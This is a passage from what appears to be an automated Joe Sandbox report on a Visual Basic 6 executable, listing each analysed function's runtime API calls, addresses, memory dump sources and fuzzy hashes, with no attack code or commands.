                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F112
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F117
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 0040F13C
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(0040F175), ref: 0040F16E
                                                                                                                                                                                  • __vbaErrorOverflow.MSVBVM60(?), ref: 0040F18B
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Free$Move$#516#631$#537BstrCopyErrorOverflow
                                                                                                                                                                                  • String ID: VUUU$VUUU$gfff
                                                                                                                                                                                  • API String ID: 3310697333-2314002932
                                                                                                                                                                                  • Opcode ID: 54317dd8e67cb568bc16672bdc0ba9886cd6a0f52f287c8f5b22d9497fb7e9dd
                                                                                                                                                                                  • Instruction ID: f629f5cd6c6994accf7ffd4865734aab981d1da92c9f489476db43807f34fb7a
                                                                                                                                                                                  • Opcode Fuzzy Hash: 54317dd8e67cb568bc16672bdc0ba9886cd6a0f52f287c8f5b22d9497fb7e9dd
                                                                                                                                                                                  • Instruction Fuzzy Hash: FB717771E00105EBC718CFB9DA8959DBF76ABCC341F44413AE805FB6A4DA385D8A8B58
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 004163E0 Relevance: 46.8, APIs: 31, Instructions: 331COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(00000001,00000000,660CC33A,6600A3D7), ref: 00416456
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(00000000,00000000,?,00000000), ref: 00416487
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,?,00000040,?,00000000), ref: 0041649F
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,?,?,00000000,?,?,00000040,?,00000000), ref: 004164C4
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,?,00000014,?,00000000,?,?,?,00000000,?,?,00000040,?,00000000), ref: 004164D9
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,?,000000E0,?,00000000,?,?,00000014,?,00000000,?,?,?,00000000,?,?), ref: 004164F4
                                                                                                                                                                                  • __vbaRedim.MSVBVM60(00000000,00000028,?,00000000,00000001,00000000,00000000,?,?,000000E0,?,00000000,?,?,00000014,?), ref: 00416513
                                                                                                                                                                                  • __vbaAryLock.MSVBVM60(?,?,?,00000000,?,?,00000040,?,00000000), ref: 00416527
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416547
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416567
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,3F800000,?,?,00000000,?,?,00000040,?,00000000), ref: 00416595
                                                                                                                                                                                  • __vbaAryUnlock.MSVBVM60(?,?,?,00000040,?,00000000), ref: 0041659E
                                                                                                                                                                                  • __vbaUbound.MSVBVM60(00000001,?,?,?,00000040,?,00000000), ref: 004165B8
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60(?,?,00000040,?,00000000), ref: 004165C0
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 004165F6
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416606
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416622
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416632
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416665
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416675
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 004166BD
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 004166CD
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 004166F3
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416703
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416729
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416739
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416755
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416762
                                                                                                                                                                                  • __vbaExitProc.MSVBVM60(?,?,00000040,?,00000000), ref: 0041678D
                                                                                                                                                                                  • __vbaAryDestruct.MSVBVM60(00000000,?,004167B5), ref: 004167AE
                                                                                                                                                                                  • __vbaErrorOverflow.MSVBVM60(?,00000000,?,?,00000040,?,00000000), ref: 004167CB
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Error$BoundsGenerate$System$DestructExitLockOverflowProcRedimUboundUnlock
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2234381736-0
                                                                                                                                                                                  • Opcode ID: a464f5ca76685ac84e1fccbaa1c1c20bc3de5b4abe262b6c2715ba6d0aacd5c5
                                                                                                                                                                                  • Instruction ID: f2618860313800eaedd81b2e61ad480ccb106d02fda6e258e19164c82fe6daf4
                                                                                                                                                                                  • Opcode Fuzzy Hash: a464f5ca76685ac84e1fccbaa1c1c20bc3de5b4abe262b6c2715ba6d0aacd5c5
                                                                                                                                                                                  • Instruction Fuzzy Hash: 01C15D719002199BCF14DFA8CA80AEEB7B5FF48304F61459AD419B7280D775ED82CFA5
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 0040E840 Relevance: 40.4, APIs: 21, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaChkstk.MSVBVM60(?,004025E6), ref: 0040E85E
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,004025E6), ref: 0040E8A3
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60(?,?,?,?,004025E6), ref: 0040E8B8
                                                                                                                                                                                  • #712.MSVBVM60(?,file:///,00406674,00000001,000000FF,00000000,?,?,?,?,004025E6), ref: 0040E8D9
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,?,?,?,004025E6), ref: 0040E8E4
                                                                                                                                                                                  • #712.MSVBVM60(?,00407218,004055FC,00000001,000000FF,00000000,?,?,?,?,004025E6), ref: 0040E905
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,?,?,?,004025E6), ref: 0040E910
                                                                                                                                                                                  • #572.MSVBVM60(00004002), ref: 0040E969
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040E974
                                                                                                                                                                                  • #537.MSVBVM60(00000020), ref: 0040E97F
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040E98A
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(00000001,000000FF,00000001), ref: 0040E9B6
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(00407220,00000000), ref: 0040E9C8
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000), ref: 0040E9CF
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040E9DA
                                                                                                                                                                                  • #712.MSVBVM60(?,00000000), ref: 0040E9E5
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040E9F0
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,00000000,00000000), ref: 0040EA0C
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 0040EA2E
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(0040EA78), ref: 0040EA71
                                                                                                                                                                                  • __vbaErrorOverflow.MSVBVM60 ref: 0040EAA2
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Move$#712$CopyErrorFree$#537#572ChkstkListOverflow
                                                                                                                                                                                  • String ID: $file:///
                                                                                                                                                                                  • API String ID: 1913684286-1087255347
                                                                                                                                                                                  • Opcode ID: 471baceb6f3394a0abeda471f643fca34b39d10fb75ad6f9a39b5992f0af1d91
                                                                                                                                                                                  • Instruction ID: 6c3c390ee14800d438280c46509e4d6c9a5a921f8fc3fa6165506003015d033a
                                                                                                                                                                                  • Opcode Fuzzy Hash: 471baceb6f3394a0abeda471f643fca34b39d10fb75ad6f9a39b5992f0af1d91
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6551FA71900208EBDB04DFE4DE48BDEBBB4FF08714F208229E612BB2A4DB755A45CB54
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 0040C843 Relevance: 39.4, APIs: 26, Instructions: 364COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040C884
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00406C48,0000004C), ref: 0040C8B7
                                                                                                                                                                                  • __vbaFreeObj.MSVBVM60 ref: 0040C8EF
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405414,00000728), ref: 0040C94E
                                                                                                                                                                                  • __vbaChkstk.MSVBVM60(?), ref: 0040C984
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040563C,00000020), ref: 0040C9C8
                                                                                                                                                                                  • __vbaObjSet.MSVBVM60(?,?), ref: 0040C9FB
                                                                                                                                                                                  • __vbaErrorOverflow.MSVBVM60 ref: 0040CC42
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(00000001), ref: 0040CC8C
                                                                                                                                                                                  • __vbaNew2.MSVBVM60(004055D8,0041B8D8), ref: 0040CCA4
                                                                                                                                                                                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040CCC7
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00406C48,00000040), ref: 0040CCEB
                                                                                                                                                                                  • __vbaObjSet.MSVBVM60(?,?), ref: 0040CD02
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004055C8,0000000C), ref: 0040CD18
                                                                                                                                                                                  • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0040CD28
                                                                                                                                                                                  • __vbaExitProc.MSVBVM60 ref: 0040CD31
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$CheckHresult$ErrorFree$ChkstkExitListNew2OverflowProc
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 435708370-0
                                                                                                                                                                                  • Opcode ID: 0fb701564dfaea06c5895f1466d9b178208b09d8fd869f579df3c1af8609f287
                                                                                                                                                                                  • Instruction ID: a4ec598c1f86ad3a10f33067e1d5db8d23c0cfab8629dd77bc108e4b9737f716
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0fb701564dfaea06c5895f1466d9b178208b09d8fd869f579df3c1af8609f287
                                                                                                                                                                                  • Instruction Fuzzy Hash: EDE11775900208EFDB14DFA4C988ADEBBB5FF48700F208269F509B7291D7759985CF64
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00418C90 Relevance: 36.9, APIs: 20, Strings: 1, Instructions: 103COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,00409F3C,80000002,00000000), ref: 00418CAE
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418CDB
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418CE7
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418CF3
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 00418D02
                                                                                                                                                                                  • __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004025E6), ref: 00418D1B
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(80000002,00000000,?,?,?,00000000,004025E6), ref: 00418D2B
                                                                                                                                                                                  • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6), ref: 00418D39
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418D42
                                                                                                                                                                                  • __vbaLenBstr.MSVBVM60(?,?,?,?,00000000,004025E6), ref: 00418D53
                                                                                                                                                                                  • __vbaStrToAnsi.MSVBVM60(?,?,00000000,?,?,?,00000000,004025E6), ref: 00418D62
                                                                                                                                                                                  • __vbaStrToAnsi.MSVBVM60(00000001,?,00000000,00000001,00000000,?,?,?,00000000,004025E6), ref: 00418D75
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,00000000,004025E6), ref: 00418D85
                                                                                                                                                                                  • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6), ref: 00418D93
                                                                                                                                                                                  • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6), ref: 00418DA1
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,00000000,004025E6), ref: 00418DB1
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,?,00000000,004025E6), ref: 00418DCA
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(00418E07,?,00000000,004025E6), ref: 00418DEE
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(?,00000000,004025E6), ref: 00418DF7
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(?,00000000,004025E6), ref: 00418E00
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Free$Error$AnsiCopySystemUnicode$BstrChkstkList
                                                                                                                                                                                  • String ID: `%@
                                                                                                                                                                                  • API String ID: 653519621-700023621
                                                                                                                                                                                  • Opcode ID: 47785f7da99cc1d885bec86910e85175bc0604dc897027ecb10ac562a20b6aef
                                                                                                                                                                                  • Instruction ID: 012eab173ab8f044d01c72bc6db05120050b8ff049b8a372a5089938a40e6a64
                                                                                                                                                                                  • Opcode Fuzzy Hash: 47785f7da99cc1d885bec86910e85175bc0604dc897027ecb10ac562a20b6aef
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5E41DA76900209EBCB04EFE4DE59EDEBB78FB48305F108519F216B71A0DB75AA44CB64
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 004123C0 Relevance: 34.6, APIs: 23, Instructions: 111COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,?,?,?,00000000,004025E6), ref: 004123DE
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 0041240B
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(000000FF,?,00000000,?,00000000,004025E6), ref: 0041241A
                                                                                                                                                                                  • #648.MSVBVM60(0000000A), ref: 00412439
                                                                                                                                                                                  • __vbaFreeVar.MSVBVM60 ref: 00412448
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60(?), ref: 0041245C
                                                                                                                                                                                  • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 0041246A
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 0041247A
                                                                                                                                                                                  • #570.MSVBVM60(00000000), ref: 00412481
                                                                                                                                                                                  • __vbaLenBstr.MSVBVM60(00404B24), ref: 0041248E
                                                                                                                                                                                  • __vbaLenBstr.MSVBVM60(00404B24), ref: 004124C1
                                                                                                                                                                                  • #525.MSVBVM60(00000000), ref: 004124C8
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004124D3
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 004124E3
                                                                                                                                                                                  • __vbaFileSeek.MSVBVM60(00000004,00000000), ref: 004124EE
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 004124FE
                                                                                                                                                                                  • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 0041250B
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
                                                                                                                                                                                    • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,?), ref: 0040EEF8
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
                                                                                                                                                                                    • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
                                                                                                                                                                                    • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
                                                                                                                                                                                    • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?), ref: 00412526
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 00412536
                                                                                                                                                                                  • __vbaFileClose.MSVBVM60(00000000), ref: 0041253D
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(0041257A), ref: 0041256A
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60 ref: 00412573
                                                                                                                                                                                  • __vbaErrorOverflow.MSVBVM60 ref: 00412590
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Free$Move$BstrFile$#516#631Error$#525#570#648ChkstkCloseCopyGet3OpenOverflowSeek
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2204187013-0
                                                                                                                                                                                  • Opcode ID: aee74aa748bdbe5f43d680c2071f8268772085965dd0da7e2e4a6c12403588e9
                                                                                                                                                                                  • Instruction ID: 9955b3bf1519d9cbb4ebd4c64d53d5ed1380afe2e3f12c5c860cc2a089516978
                                                                                                                                                                                  • Opcode Fuzzy Hash: aee74aa748bdbe5f43d680c2071f8268772085965dd0da7e2e4a6c12403588e9
                                                                                                                                                                                  • Instruction Fuzzy Hash: F341E971D00248EBDB04DFA4DB5DBDEBBB5AB48305F208129E512B76A0DB785A44CB58
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 004161B0 Relevance: 31.7, APIs: 21, Instructions: 182COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaAryConstruct2.MSVBVM60(?,004075E8,00000011,00000000,660CC33A,6600A3D7), ref: 00416207
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(00000000,?,00000040,?,00000000), ref: 00416231
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,?,00000002), ref: 00416242
                                                                                                                                                                                  • #537.MSVBVM60(00000000), ref: 00416252
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0041625F
                                                                                                                                                                                  • #537.MSVBVM60(?,00000000), ref: 0041626B
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00416272
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000), ref: 00416275
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00416280
                                                                                                                                                                                  • __vbaStrCmp.MSVBVM60(004075CC,00000000), ref: 00416288
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004162A5
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,?,?,00000000), ref: 004162D9
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,?,00000004,?,00000000,?,?,?,00000000), ref: 004162EF
                                                                                                                                                                                  • #537.MSVBVM60(?,?,?,00000004,?,00000000,?,?,?,00000000), ref: 00416300
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,?,00000004,?,00000000,?,?,?,00000000), ref: 00416307
                                                                                                                                                                                  • __vbaStrCmp.MSVBVM60(004075E0,00000000,?,?,00000004,?,00000000,?,?,?,00000000), ref: 0041630F
                                                                                                                                                                                  • #537.MSVBVM60(00000000,?,?,00000004,?,00000000,?,?,?,00000000), ref: 00416326
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,?,00000004,?,00000000,?,?,?,00000000), ref: 0041632D
                                                                                                                                                                                  • __vbaStrCmp.MSVBVM60(004075D8,00000000,?,?,00000004,?,00000000,?,?,?,00000000), ref: 00416335
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,00000004,?,00000000,?,?,?,00000000), ref: 0041636D
                                                                                                                                                                                  • __vbaAryDestruct.MSVBVM60(00000000,?,004163C6), ref: 004163BF
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Move$#537ErrorSystem$FreeList$Construct2Destruct
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2170920009-0
                                                                                                                                                                                  • Opcode ID: 6ebc35bea6a8f601c4351b039a5634e8cf150fa43bae1ceb42ad26cebf419b59
                                                                                                                                                                                  • Instruction ID: 748b6d861cac5db048dabb3adba27979951a1416e05c768a4f54423434dde149
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6ebc35bea6a8f601c4351b039a5634e8cf150fa43bae1ceb42ad26cebf419b59
                                                                                                                                                                                  • Instruction Fuzzy Hash: 99518371A00219ABDB14DBB4CD45FEEBBB9EF48700F11812AE946F7291DA745D04CB94
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 0040E340 Relevance: 31.7, APIs: 21, Instructions: 166COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(00000001), ref: 0040E391
                                                                                                                                                                                  • __vbaCastObj.MSVBVM60(00000000,004071DC), ref: 0040E39F
                                                                                                                                                                                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040E3AA
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00407144,000007C4), ref: 0040E3D0
                                                                                                                                                                                  • __vbaFreeObj.MSVBVM60 ref: 0040E3DD
                                                                                                                                                                                  • __vbaCastObj.MSVBVM60(00000000,004071DC), ref: 0040E3F0
